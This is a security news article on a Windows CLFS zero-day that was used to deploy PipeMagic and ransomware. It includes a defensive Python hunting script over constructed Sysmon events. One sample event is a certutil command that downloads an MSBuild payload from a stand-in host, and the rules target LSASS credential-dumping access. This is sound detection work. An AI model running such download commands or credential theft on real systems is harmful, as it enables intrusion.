Windows Zero-Day Used to Spread PipeMagic Ransomware Before Patch
A recently patched vulnerability in Windows was actively exploited as a zero-day to deploy the PipeMagic ransomware against a limited number of targets, Microsoft has confirmed. The flaw resided in the Windows Common Log File System (CLFS).

Microsoft has revealed that a security flaw in the Windows Common Log File System (CLFS) was being actively exploited as a zero-day. The good news? It's patched now. The bad news? It was used in targeted ransomware attacks.
According to Microsoft, these attacks targeted "organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia." Microsoft's full report gives the details.
The vulnerability, tracked as CVE-2025-29824, is a privilege escalation bug. Think of it as a sneaky way for attackers who already have a foothold on a machine to climb from an ordinary user account to SYSTEM-level access. Microsoft rolled out a fix as part of their April 2025 Patch Tuesday update.
Microsoft is calling the group behind these attacks Storm-2460. They're using a piece of malware called PipeMagic to deliver the exploit, along with the ransomware itself.
So, how are they getting in? The initial access method is still under investigation. However, researchers have spotted the attackers using the `certutil` utility to download malware from legitimate, but compromised, third-party sites.
This malware is actually a malicious MSBuild file. It contains an encrypted payload which, once unpacked, launches PipeMagic. This plugin-based Trojan has been around since 2022.
Interestingly, CVE-2025-29824 isn't the first zero-day delivered via PipeMagic. CVE-2025-24983, a Windows Win32 Kernel Subsystem privilege escalation bug, was delivered the same way and patched last month.
And before that? PipeMagic was linked to Nokoyawa ransomware attacks, exploiting yet *another* CLFS zero-day (CVE-2023-28252).
Kaspersky noted back in April 2023 that victims were infected with PipeMagic through an MSBuild script *before* the CLFS exploit was even used.
One bright spot: Windows 11, version 24H2, isn't affected by this exploit, because access to certain System Information Classes within NtQuerySystemInformation is restricted there to users with SeDebugPrivilege, which is usually limited to admin-like users.
According to Microsoft, "The exploit targets a vulnerability in the CLFS kernel driver... The exploit then utilizes a memory corruption and the RtlSetAllBits API to overwrite the exploit process's token with the value 0xFFFFFFFF, enabling all privileges for the process, which allows for process injection into SYSTEM processes." (Technical, we know, but important!)
After a successful exploit, the attackers grab user credentials by dumping the memory of LSASS, then encrypt files, giving them a random extension.
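Two of the behaviours described above, certutil used as a downloader and a process reading LSASS memory, plus the MSBuild project file dropped in a user-writable folder, are things a defender can hunt for in endpoint telemetry. The script below is an added example written for this article, not Microsoft's or Storm-2460's code, and it runs three simple rules over a handful of constructed Sysmon-style events (Event ID 1 process creation and Event ID 10 process access). The field names, the LSASS allowlist, and the list of user-writable path fragments are assumptions to be tuned for a real environment.

```python
"""Hunt for certutil downloads, MSBuild run from user-writable paths, and
non-system processes reading LSASS memory in Sysmon-style events.
Added example; events below are constructed, not real telemetry."""
import re

# Sysmon Event ID 10 GrantedAccess bit that allows reading another process's
# memory (PROCESS_VM_READ). Credential dumpers need it to read LSASS.
PROCESS_VM_READ = 0x0010

# Constructed allowlist of system images that legitimately open LSASS with
# broad access. An assumption for this example; tune it per environment.
LSASS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed path fragments where a build project file is unusual but a
# dropped malicious MSBuild file is typical.
USER_WRITABLE_FRAGMENTS = (
    "c:\\users\\public\\",
    "c:\\windows\\temp\\",
    "\\appdata\\local\\temp\\",
    "\\downloads\\",
)

URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f "
                     "http://example.invalid/a.msbuild C:\\Users\\Public\\a.proj",
     "user": "CORP\\jdoe"},
    {"event_id": 1, "image": r"C:\Windows\System32\certutil.exe",
     "command_line": "certutil.exe -hashfile C:\\Temp\\setup.exe SHA256",
     "user": "CORP\\jdoe"},
    {"event_id": 1, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "command_line": "MSBuild.exe C:\\Users\\Public\\a.proj", "user": "CORP\\jdoe"},
    {"event_id": 10, "source_image": r"C:\Users\Public\a.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1FFFFF"},
    {"event_id": 10, "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1FFFFF"},
    {"event_id": 10, "source_image": r"C:\Program Files\EDR\agent.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1000"},
]


def is_certutil_download(event):
    """Event ID 1: certutil invoked with its URL-cache switch and a remote URL."""
    if event.get("event_id") != 1:
        return False
    if not event.get("image", "").lower().endswith("\\certutil.exe"):
        return False
    cmd = event.get("command_line", "").lower()
    return ("-urlcache" in cmd or "/urlcache" in cmd) and bool(URL_RE.search(cmd))


def is_msbuild_from_user_path(event):
    """Event ID 1: MSBuild handed a project that lives in a user-writable folder."""
    if event.get("event_id") != 1:
        return False
    if not event.get("image", "").lower().endswith("\\msbuild.exe"):
        return False
    cmd = event.get("command_line", "").lower()
    return any(fragment in cmd for fragment in USER_WRITABLE_FRAGMENTS)


def is_suspicious_lsass_access(event, allowlist=LSASS_ALLOWLIST):
    """Event ID 10: a non-allowlisted image opens lsass.exe with VM_READ."""
    if event.get("event_id") != 10:
        return False
    if not event.get("target_image", "").lower().endswith("\\lsass.exe"):
        return False
    if event.get("source_image", "").lower() in allowlist:
        return False
    try:
        granted = int(event.get("granted_access", "0"), 16)
    except ValueError:
        return False
    return bool(granted & PROCESS_VM_READ)


RULES = [
    ("certutil_download", is_certutil_download),
    ("msbuild_user_path", is_msbuild_from_user_path),
    ("lsass_memory_access", is_suspicious_lsass_access),
]


def triage(events):
    """Return (rule_name, detail) for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                detail = ev.get("command_line") or (
                    f"{ev.get('source_image')} -> {ev.get('target_image')} "
                    f"({ev.get('granted_access')})")
                hits.append((name, detail))
    return hits


if __name__ == "__main__":
    for name, detail in triage(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

The LSASS rule deliberately checks the PROCESS_VM_READ bit rather than matching the exact access mask, since dumpers request varying masks; the allowlist is matched on the full lowercase path so that a same-named binary in another directory is still flagged. Expect the certutil hash-file call, the allowlisted csrss.exe access, and the EDR agent's limited-information open to pass quietly, and the other three events to surface.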
Microsoft hasn't been able to get their hands on a ransomware sample, but they did find that the ransom note included a TOR domain linked to the RansomEXX ransomware family.
Microsoft emphasizes that "Ransomware threat actors value post-compromise elevation of privilege exploits because these could enable them to escalate initial access... into privileged access. They then use privileged access for widespread deployment and detonation of ransomware within an environment." In other words, they are looking for any advantage they can get!